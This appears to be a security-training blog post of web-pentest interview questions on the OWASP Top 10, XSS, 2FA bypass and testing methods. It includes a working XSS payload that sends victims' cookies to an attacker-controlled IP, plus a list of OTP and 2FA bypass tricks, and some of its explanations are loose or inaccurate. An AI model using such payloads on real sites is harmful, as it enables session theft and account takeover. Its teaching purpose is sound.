1. What is OWASP top 10?
OWASP (Open web application security project) Top 10 is a list of vulnerabilities which is used to identify “web application” based attacks.
There are in total 10 most common web app based attacks which are listed and portrayed in owasp top 10.
It was first updated in 2013 and then 2017 and we are still using the 2017 version till now.
2. What are the changes between the 2013 & 2017 version?
There are 4 major changes :
IDOR( insecure direct object references) + MFLAC (missing functional level access control )= BAC(broken access control)
New added are :XXE(XML External Entities) is added in 2017
Insecure Deserialization is added in 2017
Insufficient Logging and monitoring is added in 2017
3.What is your favourite OWASP Top 10 vulnerability
You can tell any of the 1 or 2 bugs from owasp top 10.
There are 3 Types — Reflected, Stored, DOM.
Reflected: if any payload is injected into the web application and if it gets reflected and executed into the web app then it is reflected based xss.
Stored : if any payload is injected into the web application and if it gets executed and stored into the user’s login page ,then it is stored based xss.
Document object model: if any payload is injected into the web application and if gets into the source and comes out of sink then it is a dom based xss.
In this case Vulnerable sink are : document.innerhtml,document.location.,document.domain(),
If alert is blocked, then confirm, prompt, print can be used as a payload.
4. What can be achieved by XSS?
2.Also We will use a document.cookie payload which will give the cookie and we can redirect the cookie to the attackers server and thus we can take the cookie from our logs.
Final Payload <ScRipt>document.location.href=”http://192.168.0.106:5000/?c=”+document.cookie;</script>
Note: We can also take a screenshot of the victim machine using XSS.
5. How will you fix/mitigate XSS?
By using Html encoding. We will not use blacklist payloads because that can be bypassed easily as we would not be able to put a strict regex.
Note: Whitelisting input can also be used sometimes, but HTML Encoding or breaking the balancing of JS code should be implemented
6. What is Authentication Bypass, Give some insights ?
Attacker can bypass the username password or authentication/login flow of the website. Because we are able to get full access to any user’s account using this attack.It is considered to be a dangerous and high severity attack
Different Types of Auth Bypass :
1. Login Bypass : in this we generally do username and password bypass
2. Response Manipulation : (false to true) , ( 0 to 1 ):
3. Status Code manipulation: from 403 Forbidden to 200 OK
4. OTP bypass: which will be done by brute forcing
5. Captcha Bypass : which will be done response manipulation
6. Code leakage in JS File: Rare but some JS Files may contain info about the 2FA Code
7. 2FA Code Reuse: Same code can be reused (Same Code works for same device)/ Serial OTP’s
8. No Brute Force Protection : Possible to brute-force any length 2FA Code
9. Missing 2FA Code Integrity Validation: Code for any user account can be used to bypass the 2FA ( I use my OTP to bypass your verification)
10. CSRF on 2FA Disabling: No CSRF Protection on disabling 2FA, also there is no auth confirmation
11. Password Reset Disable 2FA: 2FA gets disabled on password change/email change
12. Bypass 2FA with null or 000000 : Enter “null” in 2FA code -> Enter 000000 in 2FA code -> Send empty code in 2FA code.
7. What is the root cause of clickjacking Attack?
Clickjacking happens due to the absence of X-Frame-Option. Enabling this X-Frame-Option or using frame busters will fix the clickjacking issue.
8. What is diff between SAST & DAST?
SAST is known as Static Application Security Testing and DAST is known as Dynamic Application Security Testing.
In SAST — we check the source code or do static analysis of the “code”.
In DAST — we check the dynamic requests sent between “client and server”
9. Black/White/Grey Box Testing
WhiteBox : In this type of testing we have all the information about the target from the client. We are aware about underlying technology, IP’s and other details like DB(database) version, architecture etc. also a walkthrough is provided to understand how the app works.
Grey Box: Same as above but limited information is provided
Black Box: We do not have much information about target stack like technology etc. only the IP Address or domain name is given by the client. This can be considered as when we perform Bug bounty Hunting.
Note: This is the first part of the article and there will be more upcoming parts with more questions.
🧑🏻🏫 💥Stay Tuned and follow us for more:💥🧑🏻🏫
🧑🏻💻 Cyber Security School : https://learn.hacktify.in
🔗 Udemy: https://www.udemy.com/user/rohit-gautam-38/
🧑🏻🏫 Live Trainings: https://hacktify.in/#live_training-slider
📌 Youtube :
💬 Linkedin: https://www.linkedin.com/company/hacktifycs